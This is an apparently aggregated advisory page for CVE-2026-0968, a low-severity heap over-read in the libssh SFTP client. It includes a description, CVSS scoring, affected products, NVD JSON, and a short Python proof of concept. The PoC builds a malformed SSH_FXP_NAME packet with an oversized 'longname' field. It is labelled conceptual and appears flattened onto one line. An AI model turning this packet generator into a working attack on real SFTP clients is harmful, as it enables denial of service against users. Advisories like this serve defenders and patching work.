Security Vulnerability Report
中文
CVE-2026-0968 CVSS 3.1 LOW

CVE-2026-0968

Published: 2026-03-26 21:17:01
Last Modified: 2026-05-19 14:16:38
Source: [email protected]

Description

A flaw was found in libssh in which a malicious SFTP (SSH File Transfer Protocol) server can exploit this by sending a malformed 'longname' field within an `SSH_FXP_NAME` message during a file listing operation. This missing null check can lead to reading beyond allocated memory on the heap. This can cause unexpected behavior or lead to a denial of service (DoS) due to application crashes.

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:libssh:libssh:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:* - VULNERABLE
libssh < 0.11.4
libssh < 0.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import struct # Simulated Malicious SFTP Server for CVE-2026-0968 PoC # This script demonstrates the generation of a malformed SSH_FXP_NAME packet. def create_malicious_sftp_name_packet(): # Packet Type: SSH_FXP_NAME (104) packet_type = 104 request_id = 1 count = 1 filename = b"exploit.txt" # Malformed longname: This field is crafted to trigger the missing null check # leading to a heap out-of-bounds read in the vulnerable libssh client. malformed_longname = b"A" * 1000 # Excessive length or missing null terminator # Construct payload (simplified structure) payload = struct.pack('!I', request_id) payload += struct.pack('!I', count) # Filename string (4-byte length + data) payload += struct.pack('!I', len(filename)) + filename # Longname string (4-byte length + malformed data) payload += struct.pack('!I', len(malformed_longname)) + malformed_longname # Dummy attributes (flags) payload += struct.pack('!I', 0) # Full packet: 4-byte length + 1-byte type + payload full_packet = struct.pack('!I', len(payload) + 1) + struct.pack('!B', packet_type) + payload return full_packet # Note: This is a conceptual payload generator. # A full exploit would require implementing the SSH handshake and SFTP protocol channel.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0968", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:01.150", "lastModified": "2026-05-19T14:16:38.457", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libssh in which a malicious SFTP (SSH File Transfer Protocol) server can exploit this by sending a malformed 'longname' field within an `SSH_FXP_NAME` message during a file listing operation. This missing null check can lead to reading beyond allocated memory on the heap. This can cause unexpected behavior or lead to a denial of service (DoS) due to application crashes."}, {"lang": "es", "value": "Se encontró una falla en libssh en la que un servidor SFTP (Protocolo de Transferencia de Archivos SSH) malicioso puede explotar esto enviando un campo 'longname' malformado dentro de un mensaje 'SSH_FXP_NAME' durante una operación de listado de archivos. Esta falta de verificación de nulos puede llevar a leer más allá de la memoria asignada en el heap. Esto puede causar un comportamiento inesperado o llevar a una denegación de servicio (DoS) debido a fallos de la aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libssh:libssh:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.11.3", "matchCriteriaId": "2366D711-FD0B-4A04-92BA-DE6DA0ED1BCF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:18160", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:18683", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-0968", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/", "source": "[email protected]", "tags": ["Release Notes"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.